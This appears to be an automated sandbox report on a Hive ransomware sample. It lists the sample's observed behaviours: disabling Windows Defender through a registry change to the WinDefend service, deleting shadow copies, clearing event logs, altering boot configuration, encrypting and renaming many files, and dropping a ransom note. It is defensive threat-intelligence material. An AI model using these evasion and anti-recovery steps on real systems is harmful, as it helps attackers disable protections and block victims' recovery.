Malware Analysis Report

2024-10-16 03:13

Sample ID 220323-sax1fsfhg6
Target 1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.zip
SHA256 9a049fb095bba852a831ae0a4808833f835c2cebc1c81049bdc3ce694d380194
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9a049fb095bba852a831ae0a4808833f835c2cebc1c81049bdc3ce694d380194

Threat Level: Known bad

The file 1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.zip was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies Windows Defender Real-time Protection settings

Deletes Windows Defender Definitions

Modifies security service

Hive

Clears Windows event logs

Deletes shadow copies

Modifies boot configuration data using bcdedit

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Runs ping.exe

Interacts with shadow copies

Opens file in notepad (likely ransom note)

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-23 14:55

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-23 14:55

Reported

2022-03-23 14:58

Platform

win7-20220311-en

Max time kernel

4294151s

Max time network

58s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\InvokeGrant.raw.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File renamed C:\Users\Admin\Pictures\InitializeMount.crw => C:\Users\Admin\Pictures\InitializeMount.crw.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Users\Admin\Pictures\InitializeMount.crw.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File renamed C:\Users\Admin\Pictures\ExitRestore.png => C:\Users\Admin\Pictures\ExitRestore.png.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Users\Admin\Pictures\ExitRestore.png.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File renamed C:\Users\Admin\Pictures\InvokeGrant.raw => C:\Users\Admin\Pictures\InvokeGrant.raw.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\it-IT\settings.html C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02400_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\TAB_ON.GIF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\library.js C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Vancouver.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196358.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\4.png C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\La_Rioja.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\ihr6_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\picturePuzzle.js C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18192_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.BusinessData.xml.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101859.BMP.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPrintTemplate.html.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGLINACC.DPV.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBPQT.DPV.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages.properties.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\SpiderSolitaire.exe.mui.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\40.png C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01179_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18235_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15021_.GIF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\clock.html C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\PREVIEW.GIF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152602.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_COL.HXC.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_right.png C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Darwin.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL077.XML.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\css\calendar.css C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_ON.GIF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL026.XML.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\css\clock.css C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\slideShow.css C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02417_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18210_.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Modern.dotx.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Journal\Templates\Shorthand.jtp C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\XML Files\Messenger.xml.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0089992.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\SERVWRAP.ASP.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\macroprogress.gif.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Chess\en-US\Chess.exe.mui.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239951.WMF.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\GIFT98.POC.gSiJzW_ULhqmOReIpfd7Ws7XtPWinl6dCQcbZyGPb2n_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\1fb6c6be88080f6a91c33616a9aa4c839dbc1062a904eeacd9fd379a22962498.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
